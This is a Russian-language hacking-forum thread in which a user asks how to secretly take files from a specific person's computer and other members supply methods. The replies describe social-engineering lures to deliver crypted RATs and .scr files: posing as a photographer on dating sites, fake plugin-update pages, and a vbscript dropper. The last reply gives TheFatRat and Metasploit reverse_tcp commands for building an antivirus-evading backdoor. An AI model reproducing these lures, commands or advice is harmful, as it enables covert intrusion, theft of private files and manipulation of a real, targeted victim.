![]() |
Мне нужно создать удаленный доступ к компьютеру через интернет, управлять компом не обязательно и менять там тоже ничего не надо, и так чтоб владелец не знал. Точнее нужно всего лишь скинуть файлы с его компа. Есть только ссылка в соцсети, также знаю, что пользователь любит играть в игры всякие в вк (не знаю поможет это или нет) и фактический адрес проживания. ip адрес не знаю.
В общем нужен грамотный вариант как это сделать и не палится... |
Закинь под предлогом какого либо приложения или ещё чего либо закриптованную комету.
|
Раньше мы кидали скрытый РМС ) Работал хорошо ! Помню, на сайте знакомств прикидывался фотографом и под этим предлогом кидал трой) Типо: "Посмотри на мои работы" )
|
Цитата:
|
Цитата:
|
Цитата:
видимо вся суть в твоём подходе, соц инженерия и всё такое, был бы тебе очень благодарен, если бы скинул пример диалога, ну или хотя бы план, структуру, как подвести к вопросу фото сессии |
Цитата:
|
Цитата:
- ну я не знаааааюююю.... - вот смотри примеры моих работ site.com/foto.scr так норм? |
Или к незнакомой:
Привет, я сфоткал тебя в маршрутке такой-то (смотришь в каком она городе и какие мартшрутки ходят) либо по отметкам вк/инсте и скидываешь фотку и говоршиь хотел бы познакомиться. Либо центральную улицу. ля-ля |
Цитата:
|
badoo.com-вот площадка для тренировок
|
Цитата:
|
Цитата:
|
Цитата:
|
Был ещё вариант с сеоспринт. Мы делали связку вбскрипт+РМС. Ставили задание на просмотр видоса, человек качал файлик, открывал его и автоматом выбрасывался видосик с ютуба. Но тут главное было вовремя коменты удалять )
|
ssh+tor -> hidden service
|
Цитата:
|
Цитата:
как заставить человека установить своё приложение? вижу вариант с той же фоткой, при переходе по адресу фотки, выдаётся сообщение, ваш браузер устарел, обновите плагин / флэшплеер и ссылка на apk, при загрузке ссылки на фото можно определять ОС устройства, если WIN - выдавать scr на скачку, если андроид - выдавать страницу с устаревшим плагином |
Он имел в виду людей
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|+| Изучить Metasploit (если трудно -> скачайте TheFatRat: https://github.com/Screetsec/TheFatRat) - немного проще , однако нужно попрактиковаться . |+| Вам надо изучить: как устроен Backdoor, как обойти защиту вирусов (используй virustotal для проверки -> чтобы антивирусник не начал паниковать). |+| Заходите в TheFatRat папку : root@kali~:/Test/TheFatRat# chmod +x powerfull.sh chmod +x fatrat ./fatrat |+| Выбор :2 CREATE FUD BACKDOOR (SLOW BUT POWERFULL) ifconfig ------------------ > SET LHOST IP: 192.168.1.5 SET LPORT: 8080 |+| Дальше перейдите в папку TheFatRat и найдите папку output (Там будет ваш backdoor -> Powerfull.exe). Теперь надо закинуть файл на компьютер (лучше помести в автозагрузку). После этого : root# /etc/init.d/postgresql start msfconsole ------------------------------------------------------------------------------------ msf > use exploit/multi/handler set payload windows/meterpreter/reverse_tcp show options set LHOST 192.168.1.5 set LPORT 8080 exploit ------------------------------------------------------------------------------------ meterpreter > help sysinfo screenshot ipconfig Выбирайте нужную функцию и действуйте ). Советаю вам изучить ещё утилиту Social Engineering Toolkit. Желаю Успехов ! |
| Время: 00:03 |